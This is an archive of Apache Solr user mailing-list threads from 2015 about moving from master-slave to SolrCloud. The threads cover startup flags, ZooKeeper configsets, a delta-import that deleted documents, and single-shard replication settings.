Can somebody kindly help me understand the difference between the following startup calls ? ./solr start -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 Vs ./solr start -c -p -s /solr/home -z zk1:2181,zk2:2181,zk3:2181 What happens if I don't pass the "-c" option ?? I read the documentation but got more confused. I do run a ZK ensemble of 3 instances. FYI my cloud seems to work fine and the Admin UI shows the Cloud graph just fine, but I want to just make sure I am doing the right thing and not missing any nuance. The following is from the documentation on cwiki. --- "Start Solr in SolrCloud mode, which will also launch the embedded ZooKeeper instance included with Solr. This option can be shortened to simply -c. If you are already running a ZooKeeper ensemble that you want to use instead of the embedded (single-node) ZooKeeper, you should also pass the -z parameter." - Thanks Ravi Kiran Bhaskar
Re: SolrCloud DIH issue
Yes Upayavira, that's exactly what prompted me to ask Erick as soon as I read https://cwiki.apache.org/confluence/display/solr/Config+Sets Erick, Regarding my delta-import not working I do see the dataimport.properties in zookeeper. after I "upconfig" and "linkconfig" my conf files into ZK...see below [zk: localhost: (CONNECTED) 0] ls /configs/xx [admin-extra.menu-top.html, person-synonyms.txt, entity-stopwords.txt, protwords.txt, location-synonyms.txt, solrconfig.xml, organization-synonyms.txt, stopwords.txt, spellings.txt, dataimport.properties, admin-extra.html, xslt, synonyms.txt, scripts.conf, subject-synonyms.txt, elevate.xml, admin-extra.menu-bottom.html, solr-import-config.xml, clustering, schema.xml] However, when I look into dataimport.properties in my 'conf' folder it hasn't updated even after running full-import on Sep 19 2015 1:00AM successfully and subsequent delta-import on Sep 20 2015 11:AM which did not import newer docs, This prompted me to look into the dataimport.properties in the conf folder...the details are shown below, you can clearly see the dates are quite a bit off. [@y conf]$ cat dataimport.properties #Tue Sep 15 18:11:17 UTC 2015 reindex-docs.last_index_time=2015-09-15 18\:11\:16 last_index_time=2015-09-15 18\:11\:16 sep.last_index_time=2014-03-24 13\:41\:46 I saw some JIRA tickets about different location of dataimport.properties for SolrCloud but couldnt find the path where it stores...Anybody have idea where it stores it ? Thanks Ravi Kiran Bhaskar On Sun, Sep 20, 2015 at 5:28 AM, Upayavira <u...@odoko.co.uk> wrote: > It is worth noting that the ref guide page on configsets refers to > non-cloud mode (a useful new feature) whereas people may confuse this > with configsets in cloud mode, which use Zookeeper. > > Upayavira > > On Sun, Sep 20, 2015, at 04:59 AM, Ravi Solr wrote: > > Cant thank you enough for clarifying it at length. Yeah its pretty > > confusing even for experienced Solr users. 
I used the upconfig and > > linkconfig commands to update 4 collections into zookeeper...As you > > described, I lucked out as I used the same name for configset and the > > collection and hence did not have to use the collections API :-) > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson > > <erickerick...@gmail.com> > > wrote: > > > > > Let's back up a second. Configsets are what _used_ to be in the conf > > > directory for each core on a local drive, it's just that they're now > > > kept up on Zookeeper. Otherwise, you'd have to put them on each > > > instance in SolrCloud, and bringing up a new replica on a new machine > > > would look a lot like adding a core with the old core admin API. > > > > > > So instead, configurations are kept on zookeeper. A config set > > > consists of, essentially, a named old-style "conf" directory. There's > > > no a-priori limit to the number of config sets you can have. Look in > > > the admin UI, Cloud>>tree>>configs and you'll see each name you've > > > pushed to ZK. If you explore that tree, you'll see a lot of old > > > familiar faces, schema.xml, solrconfig.xml, etc. > > > > > > So now we come to associating configs with collections. You've > > > probably done one of the examples where some things happen under the > > > covers, including explicitly pushing the configset to Zookeeper. > > > Currently, there's no option in the bin/solr script to push a config, > > > although I know there's a JIRA to do that. > > > > > > So, to put a new config set up you currently need to use the zkCli.sh > > > script see: > > > > https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities, > > > the "upconfig" command. That pushes the configset up to ZK and gives > > > it a name. > > > > > > Now, you create a collection and it needs a configset stored in ZK. 
> > > It's a little tricky in that if you do _not_ explicitly specify a > > > configest (using the collection.configName parameter to the > > > collections API CREATE command), then by default it'll look for a > > > configset with the same name as the collection. If it doesn't find > > > one, _and_ there is one and only one configset, then it'll use that > > > one (personally I find that confusing, but that's the way it works). > > > See: https://cwiki.apache.org/confluence/display/solr/Collections+API > > > > > > If you have two or more configsets in ZK, then either the configset > > > name has to be identical to the collection na
Re: SolrCloud DIH issue
Thanks Erick, I will report back once the reindex is finished. Oh, your answer reminded me of another question - Regarding configsets the documentation says "On a multicore Solr instance, you may find that you want to share configuration between a number of different cores." Can the same be used to push disparate mutually exclusive configs ? I ask this as I have 4 mutually exclusive apps, each with a single-core index, on a single machine which I am trying to convert to SolrCloud with a single-shard approach. Just being lazy and trying to find a way to update and link configs to zookeeper ;-) Thanks Ravi Kiran Bhaskar On Sat, Sep 19, 2015 at 6:54 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Just pushing up the entire configset would be easiest, but the > Zookeeper command line tools allow you to push up a single > file if you want. > > Yeah, it puzzles me too that the import worked yesterday, not really > sure what happened, the file shouldn't just disappear > > Erick > > On Sat, Sep 19, 2015 at 2:46 PM, Ravi Solr <ravis...@gmail.com> wrote: > > Thank you for the prompt response Erick. I did a full-import yesterday, > you > > are correct that I did not push dataimport.properties to ZK, should it > have > > not worked even for a full import ?. You may be right about 'clean' > option, > > I will reindex again today. BTW how do we push a single file to a > specific > > config name in zookeeper ? > > > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > > > On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com > > > > wrote: > > > >> Could not read DIH properties from > >> /configs/sitesearchcore/dataimport.properties > >> > >> This looks like somehow you didn't push this file up to Zookeeper. You > >> can check what files are there in the admin UI. How you indexed > >> yesterday is a mystery though, unless somehow this file was removed > >> from ZK. 
> >> > >> As for why you lost all the docs, my suspicion is that you have the > >> clean param set up for delta import > >> > >> FWIW, > >> Erick > >> > >> On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote: > >> > I am facing a weird problem. As part of upgrade from 4.7.2 > (Master-Slave) > >> > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using > >> > SolrEntityProcessor yesterday, all of them indexed properly. Today > >> morning > >> > I just ran the DIH again with delta import and I lost all docs...what > am > >> I > >> > missing ? Did anybody face similar issue ? > >> > > >> > Here are the errors in the logs > >> > > >> > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was > >> not > >> > closed! > >> > req=waitSearcher=true= > >> > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > >> > 9/19/2015, > >> > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, > 2:41:17 AM > >> > WARN null ZKPropertiesWriter Could not read DIH properties from > >> > /configs/sitesearchcore/dataimport.properties :class > >> > org.apache.zookeeper.KeeperException$NoNodeException > >> > > >> > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode > >> > = NoNode for /configs/sitesearchcore/dataimport.properties > >> > at > >> org.apache.zookeeper.KeeperException.create(KeeperException.java:111) > >> > at > >> org.apache.zookeeper.KeeperException.create(KeeperException.java:51) > >> > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155) > >> > at > >> org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349) > >> > at > >> > org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91) > >> > at > >> > org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65) > >> > at > >> > org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307) > 
>> > at > >> > org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253) > >> > at > >> > org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416) > >> > at > >> > org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480) > >> > at > >> > org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461) > >> > > >> > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo > was > >> not > >> > closed! > >> > req=waitSearcher=true= > >> > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > >> > 9/19/2015, > >> > 11:16:43 AM ERROR null SolrCore prev == info : false > >> > > >> > > >> > > >> > Thanks > >> > > >> > Ravi Kiran Bhaskar > >> >
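For reference, the "push a single file" Erick mentions is the putfile command of the Solr 5.x zkcli.sh script. A sketch (zkhost, configset name, and file paths are placeholders; the command is composed and echoed rather than executed, since it needs a live ZooKeeper):

```shell
# Placeholders: adjust zkhost and the configset name to your install.
ZKHOST="localhost:2181"
CONFNAME="sitesearchcore"

# Push one local file into an existing configset node in ZooKeeper.
CMD="server/scripts/cloud-scripts/zkcli.sh -zkhost $ZKHOST -cmd putfile /configs/$CONFNAME/dataimport.properties ./dataimport.properties"
echo "$CMD"
```

After the file lands in ZK, the NoNodeException for /configs/sitesearchcore/dataimport.properties above should go away.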
Re: SolrCloud DIH issue
Can't thank you enough for clarifying it at length. Yeah it's pretty confusing even for experienced Solr users. I used the upconfig and linkconfig commands to update 4 collections into zookeeper...As you described, I lucked out as I used the same name for configset and the collection and hence did not have to use the collections API :-) Thanks, Ravi Kiran Bhaskar On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Let's back up a second. Configsets are what _used_ to be in the conf > directory for each core on a local drive, it's just that they're now > kept up on Zookeeper. Otherwise, you'd have to put them on each > instance in SolrCloud, and bringing up a new replica on a new machine > would look a lot like adding a core with the old core admin API. > > So instead, configurations are kept on zookeeper. A config set > consists of, essentially, a named old-style "conf" directory. There's > no a-priori limit to the number of config sets you can have. Look in > the admin UI, Cloud>>tree>>configs and you'll see each name you've > pushed to ZK. If you explore that tree, you'll see a lot of old > familiar faces, schema.xml, solrconfig.xml, etc. > > So now we come to associating configs with collections. You've > probably done one of the examples where some things happen under the > covers, including explicitly pushing the configset to Zookeeper. > Currently, there's no option in the bin/solr script to push a config, > although I know there's a JIRA to do that. > > So, to put a new config set up you currently need to use the zkCli.sh > script see: > https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities, > the "upconfig" command. That pushes the configset up to ZK and gives > it a name. > > Now, you create a collection and it needs a configset stored in ZK. 
> It's a little tricky in that if you do _not_ explicitly specify a > configset (using the collection.configName parameter to the > collections API CREATE command), then by default it'll look for a > configset with the same name as the collection. If it doesn't find > one, _and_ there is one and only one configset, then it'll use that > one (personally I find that confusing, but that's the way it works). > See: https://cwiki.apache.org/confluence/display/solr/Collections+API > > If you have two or more configsets in ZK, then either the configset > name has to be identical to the collection name (if you don't specify > collection.configName), _or_ you specify collection.configName at > create time. > > NOTE: there are _no_ config files on the local disk! When a replica of > a collection loads, it "knows" what collection it's part of and pulls > the corresponding configset from ZK. > > So typically the process is this. > > you create the config set by editing all the usual suspects, schema.xml, > solrconfig.xml, DIH config etc. > > you put those configuration files into some version control system (you > are using one, right?) > > you push the configs to Zookeeper > > you create the collection > > you figure out you need to change the configs so you > > check the code out of your version control > > edit them > > put the current version back into version control > > push the configs up to zookeeper, overwriting the ones already > there with that name > > reload the collection or bounce all the servers. As each replica > in the collection comes up, > it downloads the latest configs from Zookeeper to memory (not to > disk) and uses them. > > Seems like a long drawn-out process, but pretty soon it's automatic. > And really, the only extra step is the push to Zookeeper, the rest is > just like old-style cores with the exception that you don't have to > manually push all the configs to all the machines hosting cores. 
> > Notice that I have mostly avoided talking about "cores" here. Although > it's true that a replica in a collection is just another core, it's > "special" in that it has certain very specific properties set. I > _strongly_ advise you stop thinking about old-style Solr cores and > instead think about collections and replicas. And above all, do _not_ > use the admin core API to try to create members of a collection > (cores), use the collections API to ADDREPLICA/DELETEREPLICA instead. > Loading/unloading cores is less "fraught", but I try to avoid that too > and use > > Best, > Erick > > On Sat, Sep 19, 2015 at 9:08 PM, Ravi Solr <ravis...@gmail.com> wrote: > > Thanks Erick, I will report back once the reindex is finished. Oh, your > > answer reminded me of another question - Regarding configsets the > > documentation sa
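Erick's edit/push/reload cycle can be sketched as shell commands (Solr 5.x paths; the zkhost, configset name, and collection name are placeholders, and the commands are composed and echoed rather than run, since they need a live ZooKeeper/Solr):

```shell
ZKHOST="localhost:2181"
CONF="myapp"   # configset name (placeholder)
COLL="myapp"   # collection name (placeholder)

# 1. Push (or overwrite) the configset in ZooKeeper under the name $CONF:
UPCONFIG="server/scripts/cloud-scripts/zkcli.sh -zkhost $ZKHOST -cmd upconfig -confdir ./conf -confname $CONF"

# 2. Create the collection, naming the configset explicitly so you don't
#    depend on the name-matching fallback Erick describes:
CREATE="curl 'http://localhost:8983/solr/admin/collections?action=CREATE&name=$COLL&collection.configName=$CONF&numShards=1&replicationFactor=2'"

# 3. After editing configs: run upconfig again, then reload the collection:
RELOAD="curl 'http://localhost:8983/solr/admin/collections?action=RELOAD&name=$COLL'"

printf '%s\n' "$UPCONFIG" "$CREATE" "$RELOAD"
```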
Re: SolrCloud DIH issue
Thank you for the prompt response Erick. I did a full-import yesterday, you are correct that I did not push dataimport.properties to ZK, should it not have worked even for a full import ? You may be right about 'clean' option, I will reindex again today. BTW how do we push a single file to a specific config name in zookeeper ? Thanks, Ravi Kiran Bhaskar On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com> wrote: > Could not read DIH properties from > /configs/sitesearchcore/dataimport.properties > > This looks like somehow you didn't push this file up to Zookeeper. You > can check what files are there in the admin UI. How you indexed > yesterday is a mystery though, unless somehow this file was removed > from ZK. > > As for why you lost all the docs, my suspicion is that you have the > clean param set up for delta import > > FWIW, > Erick > > On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote: > > I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave) > > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using > > SolrEntityProcessor yesterday, all of them indexed properly. Today > morning > > I just ran the DIH again with delta import and I lost all docs...what am > I > > missing ? Did anybody face similar issue ? > > > > Here are the errors in the logs > > > > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was > not > > closed! 
> > req=waitSearcher=true= > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > > 9/19/2015, > > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM > > WARN null ZKPropertiesWriter Could not read DIH properties from > > /configs/sitesearchcore/dataimport.properties :class > > org.apache.zookeeper.KeeperException$NoNodeException > > > > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode > > = NoNode for /configs/sitesearchcore/dataimport.properties > > at > org.apache.zookeeper.KeeperException.create(KeeperException.java:111) > > at > org.apache.zookeeper.KeeperException.create(KeeperException.java:51) > > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155) > > at > org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349) > > at > org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91) > > at > org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65) > > at > org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307) > > at > org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253) > > at > org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416) > > at > org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480) > > at > org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461) > > > > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was > not > > closed! > > req=waitSearcher=true= > http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false > > 9/19/2015, > > 11:16:43 AM ERROR null SolrCore prev == info : false > > > > > > > > Thanks > > > > Ravi Kiran Bhaskar >
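On the 'clean' suspicion: in the DIH, clean tells the handler to delete the existing index before importing, and in several Solr versions it defaults to true unless passed explicitly, which would explain all docs vanishing on a delta import. A hedged sketch of the request that avoids it (host and core name are placeholders, and the handler path assumes the common /dataimport registration; the URL is echoed rather than executed):

```shell
# Placeholder host/core; pass clean=false so the delta import does not
# wipe the index first.
DELTA="http://localhost:8983/solr/sitesearchcore/dataimport?command=delta-import&clean=false&commit=true"
echo "curl '$DELTA'"
```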
SolrCloud DIH issue
I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave) to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using SolrEntityProcessor yesterday, all of them indexed properly. Today morning I just ran the DIH again with delta import and I lost all docs...what am I missing ? Did anybody face similar issue ? Here are the errors in the logs 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was not closed! req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false 9/19/2015, 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM WARN null ZKPropertiesWriter Could not read DIH properties from /configs/sitesearchcore/dataimport.properties :class org.apache.zookeeper.KeeperException$NoNodeException org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode = NoNode for /configs/sitesearchcore/dataimport.properties at org.apache.zookeeper.KeeperException.create(KeeperException.java:111) at org.apache.zookeeper.KeeperException.create(KeeperException.java:51) at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155) at org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349) at org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91) at org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65) at org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307) at org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253) at org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416) at org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480) at org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461) 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was not closed! 
req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false 9/19/2015, 11:16:43 AM ERROR null SolrCore prev == info : false Thanks Ravi Kiran Bhaskar
Re: SolrCloud clarification/Question
Thank you very much Sameer, Erick and Upayavira. I got the solr cloud working !!! Hurray !! Cheers Ravi Kiran Bhaskar On Thu, Sep 17, 2015 at 3:10 AM, Upayavira <u...@odoko.co.uk> wrote: > and replicationFactor is the number of copies of your data, not the > number of servers marked 'replica'. So as has been said, if you have one > leader, and three replicas, your replicationFactor will be 4. > > Upayavira > > On Thu, Sep 17, 2015, at 03:29 AM, Erick Erickson wrote: > > Ravi: > > > > Sameer is correct on how to get it done in one go. > > > > Don't get too hung up on replicationFactor. You can always > > ADDREPLICA after the collection is created if you need to. > > > > Best, > > Erick > > > > > > On Wed, Sep 16, 2015 at 12:44 PM, Sameer Maggon > > <sam...@measuredsearch.com> wrote: > > > I just gave an example API call, but for your scenario, the > > > replicationFactor will be 4 (replicationFactor=4). In this way, all 4 > > > machines will have the same copy of the data and you can put an LB in > front > > > of those 4 machines. > > > > > > On Wed, Sep 16, 2015 at 12:00 PM, Ravi Solr <ravis...@gmail.com> > wrote: > > > > > >> OK...I understood numShards=1, when you say replicationFactor=2 what > does > > >> it mean ? I have 4 machines, then, only 3 copies of data (1 at leader > and 2 > > >> replicas) ?? so am i not under utilizing one machine ? > > >> > > >> I was more thinking in the lines of a Mesh connectivity format i.e. > > >> everybody has others copy so that I can put all 4 machines behind a > Load > > >> Balancer...Is that a wrong way to look at it ? > > >> > > >> Thanks > > >> > > >> Ravi Kiran > > >> > > >> On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon < > sam...@measuredsearch.com> > > >> wrote: > > >> > > >> > You'll have to say numShards=1 and replicationFactor=2. 
> > >> > > > >> > http:// > > >> > > > >> > > > >> > [hostname]:8983/solr/admin/collections?action=CREATE=test=test=1=2 > > >> > > > >> > On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com> > wrote: > > >> > > > >> > > Thank you very much for responding Sameer so numShards=0 and > > >> > > replicationFactr=4 if I have 4 machines ?? > > >> > > > > >> > > Thanks > > >> > > > > >> > > Ravi Kiran Bhaskar > > >> > > > > >> > > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon < > > >> > sam...@measuredsearch.com > > >> > > > > > >> > > wrote: > > >> > > > > >> > > > Absolutely. You can have a collection with just replicas and no > > >> shards > > >> > > for > > >> > > > redundancy and have a load balancer in front of it that removes > the > > >> > > > dependency on a single node. One of them will assume the role > of a > > >> > > leader, > > >> > > > and in case that leader goes down, one of the replicas will be > > >> elected > > >> > > as a > > >> > > > leader and your application will be fine. > > >> > > > > > >> > > > Thanks, > > >> > > > > > >> > > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com> > > >> wrote: > > >> > > > > > >> > > > > Hello, > > >> > > > > We are trying to move away from Master-Slave > configuration > > >> > to > > >> > > a > > >> > > > > SolrCloud environment. I have a couple of questions. > Currently in > > >> the > > >> > > > > Master-Slave setup we have 4 Machines 2 of which are indexers > and 2 > > >> > of > > >> > > > them > > >> > > > > are query servers. The query servers are fronted via Load > Balancer. > > >> > > > > > > >> > > > > There are 3 solr cores for 3 different/separate applications > > >> > (mutually > > >> > > > > exclusive). Each core is a complete index of all docs (i.e. > the > > >> data > > >> > is > > >> > > > not > > >> > > > > sharded). 
> > >> > > > > > > >> > > > > We intend to keep it in a non-sharded mode even after > the > > >> > > SolrCloud > > >> > > > > mode.The prime motivation to move to cloud is to effectively > use > > >> all > > >> > > > > servers for indexing and querying (read fault > tolerant/redundant). > > >> > > > > > > >> > > > > So, the real question is, can SolrCloud be used without > shards ? > > >> > i.e. a > > >> > > > > "collection" resides entirely on one machine rather than > > >> partitioning > > >> > > > data > > >> > > > > onto different machines ? > > >> > > > > > > >> > > > > Thanks > > >> > > > > > > >> > > > > Ravi Kiran Bhaskar > > >> > > > > > > >> > > > > > >> > > > > > >> > > > > > >> > > > -- > > >> > > > *Sameer Maggon* > > >> > > > Measured Search > > >> > > > c: 310.344.7266 > > >> > > > www.measuredsearch.com <http://measuredsearch.com> > > >> > > > > > >> > > > > >> > > > >> > > > >> > > > >> > -- > > >> > *Sameer Maggon* > > >> > Measured Search > > >> > c: 310.344.7266 > > >> > www.measuredsearch.com <http://measuredsearch.com> > > >> > > > >> > > > > > > > > > > > > -- > > > *Sameer Maggon* > > > Measured Search > > > c: 310.344.7266 > > > www.measuredsearch.com <http://measuredsearch.com> >
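Putting the thread's answer together: for the four-machine, single-shard layout discussed above, the CREATE call carries numShards=1 and replicationFactor=4, so every node holds a full copy and all four can sit behind the load balancer. A sketch (hostname and names are placeholders; the URL is echoed, not executed):

```shell
# Placeholder collection/configset name and host.
COLL="myapp"
CREATE_URL="http://localhost:8983/solr/admin/collections?action=CREATE&name=$COLL&collection.configName=$COLL&numShards=1&replicationFactor=4"
echo "curl '$CREATE_URL'"
```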
SolrCloud clarification/Question
Hello, We are trying to move away from Master-Slave configuration to a SolrCloud environment. I have a couple of questions. Currently in the Master-Slave setup we have 4 machines, 2 of which are indexers and 2 of them are query servers. The query servers are fronted via a Load Balancer. There are 3 solr cores for 3 different/separate applications (mutually exclusive). Each core is a complete index of all docs (i.e. the data is not sharded). We intend to keep it in a non-sharded mode even after the SolrCloud move. The prime motivation to move to cloud is to effectively use all servers for indexing and querying (read fault tolerant/redundant). So, the real question is, can SolrCloud be used without shards ? i.e. a "collection" resides entirely on one machine rather than partitioning data onto different machines ? Thanks Ravi Kiran Bhaskar
Re: SolrCloud clarification/Question
OK...I understood numShards=1, when you say replicationFactor=2 what does it mean ? I have 4 machines, then, only 3 copies of data (1 at leader and 2 replicas) ?? so am i not under utilizing one machine ? I was more thinking in the lines of a Mesh connectivity format i.e. everybody has others copy so that I can put all 4 machines behind a Load Balancer...Is that a wrong way to look at it ? Thanks Ravi Kiran On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon <sam...@measuredsearch.com> wrote: > You'll have to say numShards=1 and replicationFactor=2. > > http:// > > [hostname]:8983/solr/admin/collections?action=CREATE=test=test=1=2 > > On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com> wrote: > > > Thank you very much for responding Sameer so numShards=0 and > > replicationFactr=4 if I have 4 machines ?? > > > > Thanks > > > > Ravi Kiran Bhaskar > > > > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon < > sam...@measuredsearch.com > > > > > wrote: > > > > > Absolutely. You can have a collection with just replicas and no shards > > for > > > redundancy and have a load balancer in front of it that removes the > > > dependency on a single node. One of them will assume the role of a > > leader, > > > and in case that leader goes down, one of the replicas will be elected > > as a > > > leader and your application will be fine. > > > > > > Thanks, > > > > > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com> wrote: > > > > > > > Hello, > > > > We are trying to move away from Master-Slave configuration > to > > a > > > > SolrCloud environment. I have a couple of questions. Currently in the > > > > Master-Slave setup we have 4 Machines 2 of which are indexers and 2 > of > > > them > > > > are query servers. The query servers are fronted via Load Balancer. > > > > > > > > There are 3 solr cores for 3 different/separate applications > (mutually > > > > exclusive). Each core is a complete index of all docs (i.e. the data > is > > > not > > > > sharded). 
> > > > > > > > We intend to keep it in a non-sharded mode even after the > > SolrCloud > > > > mode.The prime motivation to move to cloud is to effectively use all > > > > servers for indexing and querying (read fault tolerant/redundant). > > > > > > > > So, the real question is, can SolrCloud be used without shards ? > i.e. a > > > > "collection" resides entirely on one machine rather than partitioning > > > data > > > > onto different machines ? > > > > > > > > Thanks > > > > > > > > Ravi Kiran Bhaskar > > > > > > > > > > > > > > > > -- > > > *Sameer Maggon* > > > Measured Search > > > c: 310.344.7266 > > > www.measuredsearch.com <http://measuredsearch.com> > > > > > > > > > -- > *Sameer Maggon* > Measured Search > c: 310.344.7266 > www.measuredsearch.com <http://measuredsearch.com> >